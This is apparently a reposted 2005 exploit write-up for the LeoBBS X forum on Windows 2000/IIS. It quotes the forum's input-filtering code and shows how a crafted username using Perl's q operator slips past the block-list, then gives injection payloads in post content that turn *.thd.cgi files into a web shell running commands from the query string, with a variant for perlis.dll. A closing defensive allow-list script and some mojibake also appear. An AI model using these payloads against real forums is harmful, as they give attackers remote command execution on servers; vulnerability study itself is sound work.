LeoBBS forum insufficient filtering vulnerability

 ×÷Õߣº±¾Õ¾ÊÕ¼¯   ÈÕÆÚ£º2005-5-8
×ÖºÅÑ¡Ôñ¡¼ ´ó ÖРС ¡½/ Ë«»÷¹öÆÁ µ¥»÷Í£Ö¹   
ÊÊÓð汾 leoBBS X ÂÛ̳ Ò»°ã¶¼´æÔڵĩ¶´ £¨²âÊÔÁ˼¸¸ö£¬¶¼Óеģ©~
ÊÊÓÃϵͳ win2000+ iis
cgi ½âÎö·½Ê½ perl.exe %s %s ,perlis.dll

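Vulnerability principle:
Insufficient filtering of user input is exploited by crafting code, thereby obtaining a shell.
The attack combines the insufficient filtering in register.cgi and in post.cgi.

1. First, look at the filtering that register.cgi in the LB forum applies during registration: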

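for ('inmembername'...) {
    $tp = $query->param($_);
    $tp = &unHTML("$tp");
    ${$_} = $tp;
}

The contents of sub unHTML {} are not important.

# Error text: "User registration & Sorry, there is a problem with the username you entered; please do not include characters such as ... in the username!"
&error("用户注册&对不起，您输入的用户名有问题，请不要在用户名中包含\@\#\$\%\^\*\(\)\+\=\\\{\}\;'\:\"\,\.\/\<\>\?\[\]这类字符！") if ($inmembername =~ /[\a\f\n\e\0\r\t\`\~\!\@\#\$\%\^\&\*\(\)\+\=\\\{\}\;'\:\"\,\.\/\<\>\?\[\]]/);
# Error text: "User registration & Please do not use underscores in the username!"
if($inmembername =~ /_/) { &error("用户注册&请不要在用户名中使用下划线！"); }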

$inmembername =~ s/\ \;//ig;
$inmembername =~ s/¡¡/ /g;
$inmembername =~ s/©¡/ /g;
$inmembername =~ s/[ ]+/ /g;
$inmembername =~ s/[ ]+/_/;
$inmembername =~ s/[_]+/_/;
$inmembername =~ s/ÿ//isg;
$inmembername =~ s///isg;
$inmembername =~ s/¡¡//isg;
$inmembername =~ s/©¡//isg;
$inmembername =~ s/()+//isg;
$inmembername =~ s/[\a\f\n\e\0\r\t\`\~\!\@\#\$\%\^\&\*\(\)\+\=
\\\{\}\;'\:\"\,\.\/\<\>\?\[\]]//isg;
$inmembername =~ s/\s*$//g;
$inmembername =~ s/^\s*//g;

# Error text: "User registration & Sorry, there is a problem with the username you entered"
&error("用户注册&对不起，您输入的用户名有问题") if ($inmembername =~ /^q(.+?)-/ig);

# The opening of this statement is not on the page; only its list of conditions survives.
(($inmembername =~ /guest/i)
||($inmembername =~ /qq-/i)
||($inmembername =~ /q-/i)
||($inmembername =~ /qx-/i)
||($inmembername =~ /qw-/i)
||($inmembername =~ /qr-/i)
||($inmembername =~ /nodisplay/i)
||($inmembername eq "admin")
||($inmembername =~ /^system/i)
||($inmembername =~ /---/i)
||($inmembername eq "root")
||($inmembername eq "copy")
||($inmembername =~ /^sub/)
||($inmembername =~ /^exec/)
||($inmembername =~ /\@ARGV/i)
||($inmembername =~ /^require/)
||($inmembername =~ /^rename/i)
||($inmembername =~ /^dir/i)
||($inmembername =~ /^print/i)
||($inmembername =~ /^con/i)
||($inmembername =~ /^nul/i)
||($inmembername =~ /^aux/i)
||($inmembername =~ /^com/i)
||($inmembername =~ /^lpt/i));

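And so on.

The filtering is quite thorough~

However, it overlooks that Perl's quote-like operators q, qq, qw and so on can also be used with other special symbols :), and this is the most crucial step.

2. Next, look at how post.cgi filters posted content: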

for ('forum','topic','membername','password','action','postno','inshowsignature',
'notify','inshowemoticons','intopictitle','inshowchgfont',
'inpost','posticon','inhiddentopic','postweiwang','moneyhidden','moneypost','uselbcode','inwater') {
    next unless defined $_;
    next if $_ eq 'SEND_MAIL';
    $tp = $query->param($_);
    $tp = &cleaninput("$tp");
    ${$_} = $tp;
}

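sub cleaninput {
# Several replacement strings below (for example those for & and ") appear to have been
# HTML entities that were decoded when this page was rendered, so those lines look like no-ops.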
my ($self, $text) = _self_or_default(@_);
# my $text = shift;
study($text);
$text =~ s/[\a\f\e\0\r\t]//isg;
$text =~ s/\ / /g;
$text =~ s/\@ARGV/\&\#64\;ARGV/isg;
$text =~ s/\;/\&\#59\;/isg;
$text =~ s/\&/\&/g;
$text =~ s/\&\#/\&\#/isg;
$text =~ s/\&\;(.{1,6})\&\#59\;/\&$1\;/isg;
$text =~ s/\&\#([0-9]{1,6})\&\#59\;/\&\#$1\;/isg;
$text =~ s/"/\"/g;
$text =~ s/ / \ /g;
$text =~ s/</\&lt;/g;
$text =~ s/>/\&gt;/g;
$text =~ s/ / /g;
$text =~ s/\n\n/<p>/g;
$text =~ s/\n/<br>/g;
$text =~ s/document.cookie/documents\&\#46\;cookie/isg;
$text =~ s/'/\&\#039\;/g;
$text =~ s/#/#/isg;
$text =~ s/&#/&#/isg;
return $text;
}

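As long as the crafted code gets past the filtering above and still runs, that is enough.

3. So, against a Win2000 machine, a shell can be obtained in the following way.
When CGI is handled by perl.exe:

Register with q€q as the username (what follows the € can be anything); other symbols can of course be used as well.
This is not something that
s/\`\~\!\@\#\$\%\^\&\*\(\)\+\=\\\{\}\;'\:\"\,\.\/\<\>\?\[\]]//isg;
=~ /^q(.+?)-/ig
($inmembername =~ /qq-/i)||($inmembername =~ /q-/i)||($inmembername =~ /qx-/i)||($inmembername =~ /qw-/i)||($inmembername =~ /qr-/i)
can filter out completely :).

Then it is only necessary to write the following into the content of a post: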

€ and ($_=$ENV{QUERY_STRING}) and (s/%20/ /ig) and ($out=`$_`) and (print $out)

The *.thd.cgi file under that forum is then a simple shell.

When CGI is handled by perlis.dll, the goal can also be achieved with suitably constructed input. I tried it, and the following can be used:
€ and($cmd=q-dir ..- )and ($t=q-1.rar- )and (@s=`$cmd`) and sysopen(AA,$t,1|256)and print AA @s
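(Because > is filtered, this took a long time to work out; you may well have a better method.) This makes it possible to see directories such as the members directory; to run a different command, just change $cmd. Upload a shell with its file extension changed, then change the extension back, and a shell is obtained.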
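The register.cgi block-list described above, set beside an allow-list check, as an added example that is not LeoBBS code and not part of the original article. The allow-list policy (ASCII letters and digits plus GB2312 hanzi, 2 to 12 characters), the function names and the sample names are assumptions made for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Block-list modelled on the register.cgi checks quoted in the article:
# a fixed set of forbidden characters plus the q...- name patterns.
sub blocklist_ok {
    my ($name) = @_;
    return 0 if $name =~ /[\a\f\n\e\0\r\t\`\~\!\@\#\$\%\^\&\*\(\)\+\=\\\{\}\;'\:\"\,\.\/\<\>\?\[\]_]/;
    return 0 if $name =~ /^q(.+?)-/i;
    return 0 if $name =~ /q[qxwr]?-/i;
    return 1;
}

# Allow-list (assumed policy, not LeoBBS's): 2-12 characters, each either an
# ASCII letter/digit or one GB2312 hanzi (lead byte B0-F7, trail byte A1-FE).
# Trail bytes in that range are never ASCII, so no quote, backslash or
# operator character can hide inside a double-byte sequence, and a stray
# high byte such as 0x80 is rejected because it is not a valid lead byte.
sub allowlist_ok {
    my ($name) = @_;
    return $name =~ /\A(?:[A-Za-z0-9]|[\xB0-\xF7][\xA1-\xFE]){2,12}\z/ ? 1 : 0;
}

# Constructed sample names (raw bytes). "\x80" is the byte this page
# renders as the euro sign.
my @samples = (
    "alice",               # plain ASCII
    "\xD5\xC5\xC8\xFD",    # two well-formed GB2312 double-byte characters
    "q-test",              # rejected by both checks
    "q\x80q",              # byte missing from the block-list: passes it
    "q\xB0q",              # lead byte followed by ASCII: malformed pair
);

for my $name (@samples) {
    # Show non-printable bytes as \xNN so the output is terminal-safe.
    (my $shown = $name) =~ s/([^\x20-\x7e])/sprintf('\\x%02X', ord $1)/ge;
    printf "%-18s blocklist=%d allowlist=%d\n",
        $shown, blocklist_ok($name), allowlist_ok($name);
}
```

Name validation is only one layer: user-supplied fields written into a file that the web server hands to the Perl interpreter remain risky, so topic data is better stored in files that are not mapped as CGI.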

ÉÏһƪ£º¶¯ÍøÂÛ̳ÉÏ´«Îļþ©¶´µÄÔ­ÀíÒÔ¼°¹¥»÷µÄ´úÂëʵÏÖ£¨1£©    ÏÂһƪ£ºÂ©¶´¹¥»÷ÈýÖÜÄê,²¡¶¾Î£º¦ÓÐÔöÎÞ¼õ  
[·¢Ë͸øºÃÓÑ]  [¹Ø±Õ´°¿Ú]  [·µ»Ø¶¥²¿]   ×ªÔØÇë×¢Ã÷À´Ô´£ºwww.it00.com   
ÌØ±ðÉùÃ÷£º ±¾Õ¾³ý²¿·ÖÌØ±ðÉùÃ÷½ûÖ¹×ªÔØµÄר¸åÍâµÄÆäËûÎÄÕ¿ÉÒÔ×ÔÓÉ×ªÔØ£¬µ«ÇëÎñ±Ø×¢Ã÷³ö´¦ºÍԭʼ×÷Õß¡£ÎÄÕ°æÈ¨¹éÎÄÕÂԭʼ×÷ÕßËùÓС£¶ÔÓÚ±»±¾Õ¾×ªÔØÎÄÕµĸöÈ˺ÍÍøÕ¾£¬ÎÒÃDZíʾÉîÉîµÄлÒâ¡£Èç¹û±¾Õ¾×ªÔصÄÎÄÕÂÓаæÈ¨ÎÊÌâÇëÁªÏµ±à¼­ÈËÔ±£¬ÎÒÃǾ¡¿ìÓèÒÔ¸üÕý¡£
ÔðÈα༭£º Ô­µã Ͷ¸å×÷Õߣº ±¾Õ¾ÊÕ¼¯
ÐÅÏ¢À´Ô´£º ÍøÂç ¼Èëʱ¼ä£º 2005-5-8
¹ØÓÚÎÒÃÇ - ¹ã¸æ·þÎñ - °æÈ¨ÉêÃ÷ - ÍøÕ¾µØÍ¼ - ÁªÏµ·½Ê½ - ×ܱàÐÅÏä - »áԱͶ¸å